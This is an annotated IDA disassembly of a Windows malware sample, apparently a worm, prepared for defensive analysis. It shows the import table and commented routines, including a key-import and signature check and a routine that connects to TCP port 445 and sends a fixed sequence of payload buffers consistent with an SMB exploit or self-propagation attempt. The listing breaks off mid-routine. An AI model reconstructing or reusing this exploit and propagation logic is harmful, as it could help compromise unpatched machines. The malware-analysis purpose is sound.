Assembly Code of File f4486ff5daebe50903d79f8893df1ff8/f4486ff5daebe50903d79f8893df1ff8_unpacked.asm


    ; +-------------------------------------------------------------------------+
    ; | This file is generated by The Interactive Disassembler (IDA)            |
    ; | Copyright (c) 2007 by DataRescue sa/nv,                                 |
    ; | Licensed to: SRI, 1 computer, std, 05/2007                              |
    ; +-------------------------------------------------------------------------+
    ;
    ; Input MD5 : F4486FF5DAEBE50903D79F8893DF1FF8
    ; File Name : u:\startupscripts\work\hiddencode.exe
    ; Format    : Portable executable for 80386 (PE)
    ; Imagebase : 31000000
    ; Section 1. (virtual address 00001000)
    ; Virtual size             : 00004000 ( 16384.)
    ; Section size in file     : 00004000 ( 16384.)
    ; Offset to raw data for section: 00001000
    ; Flags E0000080: Bss Executable Readable Writable
    ; Alignment : default
    ;
    ; Reviewer notes on this listing (analysis / detection stance):
    ;  - The single section is Readable+Writable+Executable (flags E0000080) and
    ;    holds both the import-pointer table below and code. The segment name
    ;    UPX0 plus the "_unpacked" file suffix suggest a UPX-packed original;
    ;    an RWX image section is itself a cheap static triage signal.
    ;  - The "resolved to ->" values are absolute export addresses captured on
    ;    the analysis machine. They vary per OS/DLL build and are NOT stable
    ;    indicators; the import NAMES are what matter.
    ;  - Import groups worth noting for triage: registry write/delete
    ;    (RegCreateKeyExA/RegSetValueExA/RegDeleteValueA), CryptoAPI signature
    ;    verification (CryptImportKey/CryptVerifySignatureA), cross-process
    ;    memory writes (OpenProcess/WriteProcessMemory), process enumeration and
    ;    termination (CreateToolhelp32Snapshot/Process32*/TerminateProcess),
    ;    file drop + execution (CopyFileA/WinExec/CreateProcessA), WinINet
    ;    download (InternetOpenUrlA/InternetReadFile) and raw sockets.
    ;  - Text was flattened by extraction: the angle-bracketed macro arguments
    ;    (<string>, <zero>) of the `unicode` macro were stripped, and several
    ;    `call <...>` operands later in the file are mangled the same way.
    unicode macro page,string,zero        ; IDA helper that emits a string as UTF-16; args lost in extraction
    irpc c,
    db '&c', page
    endm
    ifnb
    dw zero
    endif
    endm
    .686p
    .mmx
    .model flat
    ; ===========================================================================
    ; Segment type: Pure code
    ; Segment permissions: Read/Write/Execute
    UPX0 segment para public 'CODE' use32
    assume cs:UPX0
    ;org 31001000h
    assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
    ; --- Import pointer table (filled in by the unpacker stub; each dword is a
    ;     function pointer that the code calls indirectly, e.g. `call dword_310010AC`).
    ; ADVAPI32 --------------------------------------------------------------------
    dword_31001000 dd 77DDEAF4h             ; resolved to ->ADVAPI32.RegCreateKeyExA
    dword_31001004 dd 77DDEBE7h             ; resolved to ->ADVAPI32.RegSetValueExA
    dword_31001008 dd 77DD7883h             ; resolved to ->ADVAPI32.RegQueryValueExA
    dword_3100100C dd 77DD761Bh             ; resolved to ->ADVAPI32.RegOpenKeyExA ; sub_31002264 + 1Dr
    dword_31001010 dd 77DDEDE5h             ; resolved to ->ADVAPI32.RegDeleteValueA
    dword_31001014 dd 77DD6BF0h             ; resolved to ->ADVAPI32.RegCloseKey ; sub_31002264 + 4Er ...
    dword_31001018 dd 77E34D78h             ; resolved to ->ADVAPI32.AbortSystemShutdownA
    dword_3100101C dd 77DEA2F9h             ; resolved to ->ADVAPI32.CryptCreateHash
    dword_31001020 dd 77DEA122h             ; resolved to ->ADVAPI32.CryptHashData
    dword_31001024 dd 77DEAB80h             ; resolved to ->ADVAPI32.CryptVerifySignatureA
    dword_31001028 dd 77DEA254h             ; resolved to ->ADVAPI32.CryptDestroyHash
    dword_3100102C dd 77DEA544h             ; resolved to ->ADVAPI32.CryptDestroyKey
    dword_31001030 dd 77DE8546h             ; resolved to ->ADVAPI32.CryptReleaseContext
    dword_31001034 dd 77DE7F96h             ; resolved to ->ADVAPI32.CryptAcquireContextA
    dword_31001038 dd 77DEA879h             ; resolved to ->ADVAPI32.CryptImportKey
    align 10h
    ; KERNEL32 --------------------------------------------------------------------
    dword_31001040 dd 7C80D262h             ; resolved to ->KERNEL32.GetLocaleInfoA
    dword_31001044 dd 7C810D87h             ; resolved to ->KERNEL32.WriteFile
    dword_31001048 dd 7C809AE4h             ; resolved to ->KERNEL32.VirtualFree
    dword_3100104C dd 7C809A51h             ; resolved to ->KERNEL32.VirtualAlloc
    dword_31001050 dd 7C80B4CFh             ; resolved to ->KERNEL32.GetModuleFileNameA
    dword_31001054 dd 7C80BAA1h             ; resolved to ->KERNEL32.lstrcmpiA
    dword_31001058 dd 7C814EEAh             ; resolved to ->KERNEL32.GetSystemDirectoryA ; sub_310026A6 + 37r
    dword_3100105C dd 7C834D41h             ; resolved to ->KERNEL32.lstrcatA ; sub_310026A6 + 3Dr
    dword_31001060 dd 7C8286EEh             ; resolved to ->KERNEL32.CopyFileA
    dword_31001064 dd 7C86136Dh             ; resolved to ->KERNEL32.WinExec
    dword_31001068 dd 7C864B0Fh             ; resolved to ->KERNEL32.CreateToolhelp32Snapshot
    dword_3100106C dd 7C863DE5h             ; resolved to ->KERNEL32.Process32First
    dword_31001070 dd 7C801E16h             ; resolved to ->KERNEL32.TerminateProcess
    dword_31001074 dd 7C863F58h             ; resolved to ->KERNEL32.Process32Next
    dword_31001078 dd 7C80BE01h             ; resolved to ->KERNEL32.lstrcpyA ; sub_31002542 + 8Fr
    dword_3100107C dd 7C80BDB6h             ; resolved to ->KERNEL32.lstrlenA ; sub_31001262 + 272r ...
    dword_31001080 dd 7C802442h             ; resolved to ->KERNEL32.Sleep ; sub_31001ADF + E2r ...
    dword_31001084 dd 7C810111h             ; resolved to ->KERNEL32.lstrcpynA
    dword_31001088 dd 7C80DDF5h             ; resolved to ->KERNEL32.GetCurrentProcess
    dword_3100108C dd 7C80ADA0h             ; resolved to ->KERNEL32.GetProcAddress ; sub_31001851 + 2Cr
    dword_31001090 dd 7C801D77h             ; resolved to ->KERNEL32.LoadLibraryA ; sub_31001E06 + A4r
    dword_31001094 dd 7C80220Fh             ; resolved to ->KERNEL32.WriteProcessMemory
    dword_31001098 dd 7C809B47h             ; resolved to ->KERNEL32.CloseHandle ; sub_310019B3 + 19r ...
    dword_3100109C dd 7C8309E1h             ; resolved to ->KERNEL32.OpenProcess ; sub_31002310 + 92r
    dword_310010A0 dd 7C80B6A1h             ; resolved to ->KERNEL32.GetModuleHandleA ; UPX0:31001D8Ar
    dword_310010A4 dd 7C80929Ch             ; resolved to ->KERNEL32.GetTickCount
    dword_310010A8 dd 7C80E93Fh             ; resolved to ->KERNEL32.CreateMutexA
    dword_310010AC dd 7C810637h             ; resolved to ->KERNEL32.CreateThread ; sub_310019B3 + 12r
    dword_310010B0 dd 7C802367h             ; resolved to ->KERNEL32.CreateProcessA
    dword_310010B4 dd 7C80A017h             ; resolved to ->KERNEL32.SetEvent
    dword_310010B8 dd 7C81320Ch             ; resolved to ->KERNEL32.OpenEventA
    dword_310010BC dd 7C80C058h             ; resolved to ->KERNEL32.ExitThread ; sub_31001C18 + 66r ...
    dword_310010C0 dd 7C80180Eh             ; resolved to ->KERNEL32.ReadFile
    dword_310010C4 dd 7C810A77h             ; resolved to ->KERNEL32.GetFileSize
    dword_310010C8 dd 7C801A24h             ; resolved to ->KERNEL32.CreateFileA ; sub_310026A6 + 8Fr
    dword_310010CC dd 7C81CDDAh             ; resolved to ->KERNEL32.ExitProcess ; sub_31002476 + C3r
    dword_310010D0 dd 7C910331h             ; resolved to ->NTDLL.RtlGetLastWin32Error
    dword_310010D4 dd 7C831EABh             ; resolved to ->KERNEL32.DeleteFileA ; sub_31002476 + Fr
    dword_310010D8 dd 7C802520h             ; resolved to ->KERNEL32.WaitForSingleObject
    dword_310010DC dd 7C8308ADh             ; resolved to ->KERNEL32.CreateEventA
    dword_310010E0 dd 7C809766h             ; resolved to ->KERNEL32.InterlockedIncrement ; sub_3100202D + 58r
    align 8
    ; MSVCRT ----------------------------------------------------------------------
    dword_310010E8 dd 77C46EB0h             ; resolved to ->MSVCRT.memcmp
    dword_310010EC dd 77C47660h             ; resolved to ->MSVCRT.strchr ; sub_31002928 + 68r
    ; ---------------------------------------------------------------------------
    ; Three-byte code fragment embedded inside the import table: a stack-pivot
    ; sequence (swap eax/esp, pop a new esp, return). Referenced as DATA by
    ; loc_31002BD0 (outside this chunk), so it is most likely used as a jump/
    ; return target rather than executed in line -- confirm at the referrer.
    loc_310010F0:                           ; DATA XREF: UPX0:loc_31002BD0r
        xchg eax, esp
        pop esp
        retn
    ; ---------------------------------------------------------------------------
    db 77h                                  ; padding byte (IDA could not classify it)
    dword_310010F4 dd 77C47C60h             ; resolved to ->MSVCRT.strstr ; sub_31002310 + 79r ...
    dword_310010F8 dd 77C371D3h             ; resolved to ->MSVCRT.rand ; sub_31001AC9 + 1r ...
    dword_310010FC dd 77C371BCh             ; resolved to ->MSVCRT.srand
    dword_31001100 dd 77C46F70h             ; resolved to ->MSVCRT.memcpy
    dword_31001104 dd 77C478A0h             ; resolved to ->MSVCRT.strlen
    dword_31001108 dd 77C475F0h             ; resolved to ->MSVCRT.memset
    align 10h
    ; USER32 ----------------------------------------------------------------------
    dword_31001110 dd 7E42DE87h             ; resolved to ->USER32.FindWindowA
    dword_31001114 dd 7E41BE4Bh             ; resolved to ->USER32.GetForegroundWindow
    dword_31001118 dd 7E418A80h             ; resolved to ->USER32.GetWindowThreadProcessId
    dword_3100111C dd 7E41A8ADh             ; resolved to ->USER32.wsprintfA ; sub_31001ADF + 8Br ...
    dd 0                                    ; import-table terminator for this DLL
    ; WININET ---------------------------------------------------------------------
    dword_31001124 dd 42C2ABF4h             ; resolved to ->WININET.InternetReadFile ; sub_31002A44 + B3r
    dword_31001128 dd 42C30BFAh             ; resolved to ->WININET.InternetOpenUrlA ; sub_31002A44 + 9Er
    dword_3100112C dd 42C2C8A1h             ; resolved to ->WININET.InternetOpenA ; sub_31002A44 + 89r
    dword_31001130 dd 42C1DAC1h             ; resolved to ->WININET.InternetCloseHandle
    dword_31001134 dd 42C367F6h             ; resolved to ->WININET.InternetGetConnectedState ; UPX0:31002184r
    dd 0                                    ; import-table terminator for this DLL
    ; WS2_32 ----------------------------------------------------------------------
    dword_3100113C dd 71AB664Dh             ; resolved to ->WS2_32.WSAStartup
    dword_31001140 dd 71AB3E00h             ; resolved to ->WS2_32.bind
    dword_31001144 dd 71AB88D3h             ; resolved to ->WS2_32.listen
    dword_31001148 dd 71AC1028h             ; resolved to ->WS2_32.accept
    dword_3100114C dd 71AB50C8h             ; resolved to ->WS2_32.gethostname
    dword_31001150 dd 71AB94DCh             ; resolved to ->WS2_32.WSAGetLastError
    dword_31001154 dd 71AB4FD4h             ; resolved to ->WS2_32.gethostbyname
    dword_31001158 dd 71AB3B91h             ; resolved to ->WS2_32.socket ; sub_31001C18 + ACr
    dword_3100115C dd 71AB3F41h             ; resolved to ->WS2_32.inet_ntoa ; sub_310020F4 + Dr
    dword_31001160 dd 71AB2B66h             ; resolved to ->WS2_32.ntohs ; sub_31001C18 + F0r
    dword_31001164 dd 71AB406Ah             ; resolved to ->WS2_32.connect
    dword_31001168 dd 71AB428Ah             ; resolved to ->WS2_32.send ; sub_31001ADF + 67r ...
    dword_3100116C dd 71AB615Ah             ; resolved to ->WS2_32.recv ; sub_31001262 + 1D8r ...
    dword_31001170 dd 71AC0BDEh             ; resolved to ->WS2_32.shutdown ; sub_31001ADF + 11Br
    dword_31001174 dd 71AB9639h             ; resolved to ->WS2_32.closesocket
    align 10h
    ; Three-dword record {-1, 0, &nullsub_1}; its consumer is not in this chunk,
    ; so its meaning (e.g. a handler/SEH-style record) is unconfirmed.
    dword_31001180 dd 0FFFFFFFFh, 0
    dd offset nullsub_1
    align 10h

    ########################## SUBROUTINE ##########################

    ;-----------------------------------------------------------------------
    ; sub_31001190 -- open a CryptoAPI provider and import a key blob.
    ; C-style (cdecl: plain `retn`, caller pops 3 args):
    ;   int sub_31001190(DWORD ctx[2], const BYTE *blob, DWORD blobLen)
    ; In:   arg_0 = ctx   ctx[0] <- HCRYPTPROV, ctx[1] <- HCRYPTKEY
    ;       arg_4 = blob, arg_8 = blobLen  (passed untouched to CryptImportKey)
    ; Out:  eax = 0 ok; 1 = CryptAcquireContextA failed both ways;
    ;       2 = CryptImportKey failed
    ; Clobbers: eax, ecx, edx, flags (ebx/esi/edi are preserved)
    ; Note: the blob type is not visible here. sub_310011FB later passes ctx[1]
    ;       as hPubKey to CryptVerifySignatureA, so this is presumably an
    ;       embedded public key used to verify signed data -- confirm at the
    ;       caller (sub_31002928).
    ;-----------------------------------------------------------------------
    sub_31001190 proc near                  ; CODE XREF: sub_31002928 + BFp
    arg_0 = dword ptr 4
    arg_4 = dword ptr 8
    arg_8 = dword ptr 0Ch
        push ebx
        mov ebx, [ esp + 4 + arg_0 ]        ; ebx = ctx
        push esi
        mov esi, dword_31001034             ; esi = &CryptAcquireContextA
        push edi
        xor edi, edi                        ; edi = 0 (reused as NULL/0 argument)
        ; CryptAcquireContextA(&ctx[0], NULL, NULL, PROV_RSA_FULL (1), 0)
        push edi                            ; dwFlags = 0
        push 1                              ; dwProvType = PROV_RSA_FULL
        push edi                            ; pszProvider = NULL
        push edi                            ; pszContainer = NULL
        push ebx                            ; phProv = &ctx[0]
        call esi ; CryptAcquireContextA
        test eax, eax
        jnz short loc_310011BD
        ; Retry with dwFlags = 8 (CRYPT_NEWKEYSET): create the key container
        ; if it does not exist yet.
        push 8
        push 1
        push edi
        push edi
        push ebx
        call esi ; CryptAcquireContextA
        test eax, eax
        jnz short loc_310011BD
        push 1                              ; return 1: no provider
        pop eax
        jmp short loc_310011DB
    ; ---------------------------------------------------------------------------
    loc_310011BD:                           ; CODE XREF: sub_31001190 + 19j ; sub_31001190 + 26j
        ; CryptImportKey(ctx[0], blob, blobLen, hPubKey=0, dwFlags=0, &ctx[1])
        lea eax, [ ebx + 4 ]
        push eax                            ; phKey = &ctx[1]
        push edi                            ; dwFlags = 0
        push edi                            ; hPubKey = 0
        push [ esp + 18h + arg_8 ]          ; dwDataLen = blobLen
        push [ esp + 1Ch + arg_4 ]          ; pbData = blob
        push dword ptr [ ebx ]              ; hProv = ctx[0]
        call dword_31001038 ; CryptImportKey
        ; Fold BOOL into return code: eax = (eax != 0) ? 0 : 2
        neg eax
        sbb eax, eax                        ; -1 if nonzero, else 0
        and al, 0FEh                        ; -2 or 0
        inc eax
        inc eax                             ; 0 (ok) or 2 (import failed)
    loc_310011DB:                           ; CODE XREF: sub_31001190 + 2Bj
        pop edi
        pop esi
        pop ebx
        retn
    sub_31001190 endp

    ########################## SUBROUTINE ##########################

    ;-----------------------------------------------------------------------
    ; sub_310011DF -- release the key/provider pair created by sub_31001190.
    ; C-style (cdecl): int sub_310011DF(DWORD ctx[2])
    ; In:   arg_0 = ctx   ctx[1] = HCRYPTKEY, ctx[0] = HCRYPTPROV
    ; Out:  eax = 0 always (API return values are ignored)
    ; Clobbers: eax, ecx, edx, flags
    ;-----------------------------------------------------------------------
    sub_310011DF proc near                  ; CODE XREF: sub_31002928 + 10Fp
    arg_0 = dword ptr 4
        push esi
        mov esi, [ esp + 4 + arg_0 ]        ; esi = ctx
        push dword ptr [ esi + 4 ]          ; hKey = ctx[1]
        call dword_3100102C ; CryptDestroyKey
        push 0                              ; dwFlags = 0
        push dword ptr [ esi ]              ; hProv = ctx[0]
        call dword_31001030 ; CryptReleaseContext
        xor eax, eax                        ; return 0 regardless of outcome
        pop esi
        retn
    sub_310011DF endp

    ########################## SUBROUTINE ##########################

    ;-----------------------------------------------------------------------
    ; sub_310011FB -- hash a buffer (CALG_MD5) and verify a signature over it
    ; with the key in ctx[1].
    ; C-style (cdecl, 6 args):
    ;   int sub_310011FB(DWORD ctx[2], const BYTE *data, DWORD dataLen,
    ;                    const BYTE *sig, DWORD sigLen, BOOL *verified)
    ; In:   arg_0 = ctx (its stack slot is reused to hold the HCRYPTHASH)
    ;       arg_4/arg_8 = data/dataLen, arg_C/arg_10 = sig/sigLen
    ;       arg_14 = out pointer receiving the CryptVerifySignatureA BOOL
    ; Out:  eax = 0 on the normal path, 1 = CryptCreateHash failed,
    ;       2 = CryptHashData failed
    ; Clobbers: eax, ecx, edx, flags
    ; Important for readers: the signature-check RESULT is only reported via
    ; *verified; the function returns 0 whether or not the signature was valid.
    ; A caller that looks at the return value alone would accept unsigned or
    ; tampered data -- check how sub_31002928 consumes *verified.
    ;-----------------------------------------------------------------------
    sub_310011FB proc near                  ; CODE XREF: sub_31002928 + EAp
    arg_0 = dword ptr 8
    arg_4 = dword ptr 0Ch
    arg_8 = dword ptr 10h
    arg_C = dword ptr 14h
    arg_10 = dword ptr 18h
    arg_14 = dword ptr 1Ch
        push ebp
        mov ebp, esp
        push esi
        mov esi, [ ebp + arg_0 ]            ; esi = ctx
        push edi
        lea eax, [ ebp + arg_0 ]            ; &arg_0 doubles as HCRYPTHASH *phHash
        xor edi, edi                        ; edi = 0 (also the pending return code)
        ; CryptCreateHash(ctx[0], CALG_MD5 (8003h), hKey=0, dwFlags=0, &hHash)
        push eax
        push edi
        push edi
        push 8003h
        push dword ptr [ esi ]
        call dword_3100101C ; CryptCreateHash
        test eax, eax
        jnz short loc_31001221
        push 1                              ; return 1: no hash object
        pop eax
        jmp short loc_3100125E
    ; ---------------------------------------------------------------------------
    loc_31001221:                           ; CODE XREF: sub_310011FB + 1Fj
        ; CryptHashData(hHash, data, dataLen, 0)
        push edi
        push [ ebp + arg_8 ]
        push [ ebp + arg_4 ]
        push [ ebp + arg_0 ]
        call dword_31001020 ; CryptHashData
        test eax, eax
        jnz short loc_3100123A
        push 2                              ; return 2: hashing failed
        pop edi
        jmp short loc_31001253
    ; ---------------------------------------------------------------------------
    loc_3100123A:                           ; CODE XREF: sub_310011FB + 38j
        ; CryptVerifySignatureA(hHash, sig, sigLen, hPubKey=ctx[1], NULL, 0)
        push edi
        push edi
        push dword ptr [ esi + 4 ]
        push [ ebp + arg_10 ]
        push [ ebp + arg_C ]
        push [ ebp + arg_0 ]
        call dword_31001024 ; CryptVerifySignatureA
        mov ecx, [ ebp + arg_14 ]
        mov [ ecx ], eax                    ; *verified = BOOL result
    loc_31001253:                           ; CODE XREF: sub_310011FB + 3Dj
        push [ ebp + arg_0 ]
        call dword_31001028 ; CryptDestroyHash
        mov eax, edi                        ; 0, or 2 from the HashData failure
    loc_3100125E:                           ; CODE XREF: sub_310011FB + 24j
        pop edi
        pop esi
        pop ebp
        retn
    sub_310011FB endp

    ########################## SUBROUTINE ##########################

    ;-----------------------------------------------------------------------
    ; sub_31001262 -- connect to a host on TCP port 445 (1BDh) and run a fixed
    ; request/response exchange built from embedded buffers.
    ; C-style (cdecl): int sub_31001262(struct in_addr target)
    ; In:   arg_0 = target IPv4 address (by value; fed to inet_ntoa and used as
    ;       sin_addr). Its stack slot is later reused as a branch flag.
    ; Out:  eax = var_C: starts at 1 and is cleared to 0 only after the final
    ;       send at loc_310017A0, so 0 = full exchange sent, 1 = aborted.
    ; Locals: ~35 KB of stack (89E4h), hence the stack-probe call below.
    ; Register roles after connect(): ebx = send, esi = Sleep, edi = 0C8h
    ;       (200 ms delay between steps), var_4 = socket.
    ;
    ; Analysis notes (defensive):
    ;  - Three embedded buffers (dword_310042C8/31004354/31004400) are sent in
    ;    sequence, each followed by a recv; the third reply must be >= 46h bytes
    ;    and reply[44h] ('1' or not) selects one of two payload layouts.
    ;  - Payload regions are pre-filled with 90h or 31h bytes and carry a string
    ;    derived from the target's dotted IP (var_4C, widened to 16-bit chars)
    ;    plus embedded blobs. This pattern is consistent with an exploit /
    ;    self-propagation attempt against the SMB service; the sent buffers
    ;    would have to be decoded to confirm which request sequence it is.
    ;  - Detection angle: outbound 445/tcp from a non-system process with
    ;    fixed 200 ms pacing and these exact request sizes (89h, 0A8h, 0DEh,
    ;    ... 10FCh, 0FDCh, 0CF8h).
    ;  - recv return values other than -1 (including 0 = peer closed) are not
    ;    checked except for the >= 46h test on the third reply.
    ;-----------------------------------------------------------------------
    sub_31001262 proc near                  ; CODE XREF: sub_31001F41 + 36p ; sub_31001FA5 + 48p ...
    var_89E4 = byte ptr - 89E4h             ; payload B part 1 (sent, 10FCh bytes)
    var_897C = byte ptr - 897Ch
    var_690C = byte ptr - 690Ch             ; payload B part 2 (sent, 0FDCh bytes)
    var_689C = byte ptr - 689Ch
    var_5DD8 = byte ptr - 5DD8h
    var_4834 = byte ptr - 4834h             ; widened copy of var_2CD8
    var_4833 = byte ptr - 4833h
    var_37A0 = byte ptr - 37A0h
    var_2CDC = byte ptr - 2CDCh
    var_2CDB = byte ptr - 2CDBh
    var_2CD8 = byte ptr - 2CD8h             ; 0DACh-byte scratch, filled with 90h
    var_24F4 = byte ptr - 24F4h
    var_24E4 = byte ptr - 24E4h
    var_21C0 = byte ptr - 21C0h
    var_21BC = byte ptr - 21BCh
    var_21B0 = byte ptr - 21B0h
    var_1F28 = byte ptr - 1F28h             ; payload A (sent, 0CF8h bytes), prefilled with 31h
    var_1EAC = byte ptr - 1EACh
    var_16DC = byte ptr - 16DCh
    var_1231 = byte ptr - 1231h
    var_F44 = byte ptr - 0F44h              ; 7D0h-byte region filled with 90h, later copied into payload A
    var_EA4 = byte ptr - 0EA4h
    var_798 = dword ptr - 798h
    var_788 = byte ptr - 788h
    var_774 = byte ptr - 774h               ; receive buffer (640h bytes)
    var_730 = byte ptr - 730h               ; == var_774 + 44h: byte 44h of a reply
    var_134 = byte ptr - 134h               ; var_4C widened to 16-bit characters
    var_133 = byte ptr - 133h
    var_E4 = byte ptr - 0E4h                ; 60h-byte request template from dword_310044E0
    var_E1 = byte ptr - 0E1h                ; length byte inside the template
    var_B7 = byte ptr - 0B7h                ; length byte inside the template
    var_B5 = byte ptr - 0B5h
    var_B4 = byte ptr - 0B4h                ; where the widened string is patched in
    var_6C = byte ptr - 6Ch                 ; dotted-decimal target IP (<= 1Dh chars)
    var_4C = byte ptr - 4Ch                 ; wsprintfA(loc_310049C0, var_6C)
    var_24 = word ptr - 24h                 ; sockaddr_in.sin_family
    var_22 = word ptr - 22h                 ; sockaddr_in.sin_port
    var_20 = dword ptr - 20h                ; sockaddr_in.sin_addr
    var_14 = dword ptr - 14h                ; 8 bytes copied from dword_310049CC/310049D0
    var_10 = dword ptr - 10h
    var_C = dword ptr - 0Ch                 ; return value (1 until success)
    var_6 = byte ptr - 6
    var_5 = byte ptr - 5
    var_4 = dword ptr - 4                   ; SOCKET
    arg_0 = dword ptr 8
        push ebp
        mov ebp, esp
        mov eax, 89E4h
        call sub_31002BA0                   ; eax = frame size: looks like a __chkstk-style stack probe -- confirm
        mov eax, dword_310049CC
        push ebx
        push edi
        push 1
        pop edi                             ; edi = 1
        xor ebx, ebx                        ; ebx = 0
        mov [ ebp + var_14 ], eax
        mov eax, dword_310049D0
        ; socket(AF_INET (2), SOCK_STREAM (1), 0)
        push ebx
        push edi
        push 2
        mov [ ebp + var_10 ], eax
        mov [ ebp + var_C ], edi            ; result = 1 (failure) until proven otherwise
        call dword_31001158 ; socket
        cmp eax, 0FFFFFFFFh                 ; INVALID_SOCKET
        mov [ ebp + var_4 ], eax
        jz loc_310017C2
        push esi
        mov esi, [ ebp + arg_0 ]            ; esi = target in_addr
        ; lstrcpynA(var_6C, inet_ntoa(target), 1Dh)
        push 1Dh
        push esi
        call dword_3100115C ; inet_ntoa
        push eax
        lea eax, [ ebp + var_6C ]
        push eax
        call dword_31001084 ; lstrcpynA
        ; wsprintfA(var_4C, loc_310049C0, var_6C) -- loc_310049C0 is a format
        ; string despite its code-style label (IDA mislabel)
        lea eax, [ ebp + var_6C ]
        push eax
        lea eax, [ ebp + var_4C ]
        push offset loc_310049C0
        push eax
        call dword_3100111C ; wsprintfA
        add esp, 0Ch
        ; Widen var_4C to 16-bit characters in var_134: 28h chars, each
        ; followed by a zero byte.
        xor ecx, ecx
        lea eax, [ ebp + var_133 ]
    loc_310012D5:                           ; CODE XREF: sub_31001262 + 83j
        mov dl, [ ebp + ecx + var_4C ]
        mov [ eax - 1 ], dl
        and byte ptr [ eax ], 0
        inc ecx
        inc eax
        inc eax
        cmp ecx, 28h
        jl short loc_310012D5
        ; var_E4 = 60h-byte template, then patch the widened string in at var_B4
        push 60h
        lea eax, [ ebp + var_E4 ]
        push offset dword_310044E0
        push eax
        call sub_31002B98 ; memcpy
        lea eax, [ ebp + var_4C ]
        push eax
        call sub_31002B92 ; strlen
        shl eax, 1                          ; widened length = 2 * strlen
        push eax
        lea eax, [ ebp + var_134 ]
        push eax
        lea eax, [ ebp + var_B4 ]
        push eax
        call sub_31002B98 ; memcpy
        add esp, 1Ch
        ; Append 9 bytes from aC+3 right after the widened string
        lea eax, [ ebp + var_4C ]
        push 9
        push (offset aC + 3)
        push eax
        call sub_31002B92 ; strlen
        pop ecx
        lea eax, [ ebp + eax * 2 + var_B5 ]
        push eax
        call sub_31002B98 ; memcpy
        ; var_5 = (strlen + 1Ah) * 2, stored into the template at var_E1
        lea eax, [ ebp + var_4C ]
        push eax
        call sub_31002B92 ; strlen
        add al, 1Ah
        push edi                            ; memcpy length = 1
        shl al, 1
        mov [ ebp + var_5 ], al
        lea eax, [ ebp + var_5 ]
        push eax
        lea eax, [ ebp + var_E1 ]
        push eax
        call sub_31002B98 ; memcpy
        ; var_6 = strlen * 2 + 9, stored into the template at var_B7
        lea eax, [ ebp + var_4C ]
        push eax
        call sub_31002B92 ; strlen
        shl al, 1
        add al, 9
        push edi
        mov [ ebp + var_6 ], al
        lea eax, [ ebp + var_6 ]
        push eax
        lea eax, [ ebp + var_B7 ]
        push eax
        call sub_31002B98 ; memcpy
        ; memset(var_1F28, 31h, 0E29h); memset(&sockaddr, 0, 10h)
        push 0E29h
        lea eax, [ ebp + var_1F28 ]
        push 31h
        push eax
        call sub_31002B8C ; memset
        push 10h
        lea eax, [ ebp + var_24 ]
        push ebx
        push eax
        call sub_31002B8C ; memset
        add esp, 44h
        mov [ ebp + var_24 ], 2             ; sin_family = AF_INET
        push 1BDh                           ; 1BDh = 445
        call dword_31001160 ; ntohs
        mov [ ebp + var_22 ], ax            ; sin_port = htons(445)
        lea eax, [ ebp + var_24 ]
        push 10h
        push eax
        push [ ebp + var_4 ]
        mov [ ebp + var_20 ], esi           ; sin_addr = target
        call dword_31001164 ; connect
        cmp eax, 0FFFFFFFFh                 ; SOCKET_ERROR
        jz loc_310017B8
        mov esi, dword_31001080             ; esi = Sleep
        mov edi, 0C8h                       ; edi = 200 ms pacing
        push edi
        call esi ; Sleep
        push ebx                            ; send flags = 0 (ebx is still 0 here)
        mov ebx, dword_31001168             ; ebx = send
        ; Step 1: send dword_310042C8 (89h bytes), wait, recv
        push 89h
        push offset dword_310042C8
        push [ ebp + var_4 ]
        call ebx ; send
        push edi
        call esi ; Sleep
        push 0
        lea eax, [ ebp + var_774 ]
        push 640h
        push eax
        push [ ebp + var_4 ]
        call dword_3100116C ; recv
        cmp eax, 0FFFFFFFFh
        jz loc_310017AD
        ; Step 2: send dword_31004354 (0A8h bytes), wait, recv
        push 0
        push 0A8h
        push offset dword_31004354
        push [ ebp + var_4 ]
        call ebx ; send
        push edi
        call esi ; Sleep
        push 0
        lea eax, [ ebp + var_774 ]
        push 640h
        push eax
        push [ ebp + var_4 ]
        call dword_3100116C ; recv
        cmp eax, 0FFFFFFFFh
        jz loc_310017AD
        ; Step 3: send dword_31004400 (0DEh bytes), wait, recv
        push 0
        push 0DEh
        push offset dword_31004400
        push [ ebp + var_4 ]
        call ebx ; send
        push edi
        call esi ; Sleep
        push 0
        lea eax, [ ebp + var_774 ]
        push 640h
        push eax
        push [ ebp + var_4 ]
        call dword_3100116C ; recv
        cmp eax, 0FFFFFFFFh
        jz loc_310017AD
        cmp eax, 46h                        ; need at least 46h bytes to read reply[44h]
        jl loc_310017AD
        cmp [ ebp + var_730 ], 31h          ; reply[44h] == '1' ?
        jnz loc_31001658                    ; no  -> layout B
        ; Layout A: arg_0 slot := 0 (flag), build var_F44 (7D0h bytes of 90h)
        ; carrying byte_31004000, the 8 bytes at var_14 and dword_31004906.
        and [ ebp + arg_0 ], 0
        push 7D0h
        lea eax, [ ebp + var_F44 ]
        push 90h
        push eax
        call sub_31002B8C ; memset
        add esp, 0Ch
        push offset byte_31004000
        call dword_3100107C ; lstrlenA
        push eax
        lea eax, [ ebp + var_EA4 ]
        push offset byte_31004000
        push eax
        call sub_31002B98 ; memcpy
        add esp, 0Ch
        lea eax, [ ebp + var_14 ]
        push eax
        call dword_3100107C ; lstrlenA     ; var_14/var_10 treated as a C string
        push eax
        lea eax, [ ebp + var_14 ]
        push eax
        lea eax, [ ebp + var_788 ]
        push eax
        call sub_31002B98 ; memcpy
        mov eax, dword_31004906
        add esp, 0Ch
        mov [ ebp + var_798 ], eax
    loc_310014F9:                           ; CODE XREF: sub_31001262 + 4E1j
        ; Common middle section (both layouts join here).
        ; Step 4: send the patched template var_E4, length = var_5 + 4
        movsx eax, [ ebp + var_5 ]
        add eax, 4
        push 0
        push eax
        lea eax, [ ebp + var_E4 ]
        push eax
        push [ ebp + var_4 ]
        call ebx ; send
        push edi
        call esi ; Sleep
        push 0
        lea eax, [ ebp + var_774 ]
        push 640h
        push eax
        push [ ebp + var_4 ]
        call dword_3100116C ; recv
        cmp eax, 0FFFFFFFFh
        jz loc_310017AD
        ; Step 5: send dword_31004544 (68h bytes)
        push 0
        push 68h
        push offset dword_31004544
        push [ ebp + var_4 ]
        call ebx ; send
        push edi
        call esi ; Sleep
        push 0
        lea eax, [ ebp + var_774 ]
        push 640h
        push eax
        push [ ebp + var_4 ]
        call dword_3100116C ; recv
        cmp eax, 0FFFFFFFFh
        jz loc_310017AD
        ; Step 6: send dword_310045B0 (0A0h bytes)
        push 0
        push 0A0h
        push offset dword_310045B0
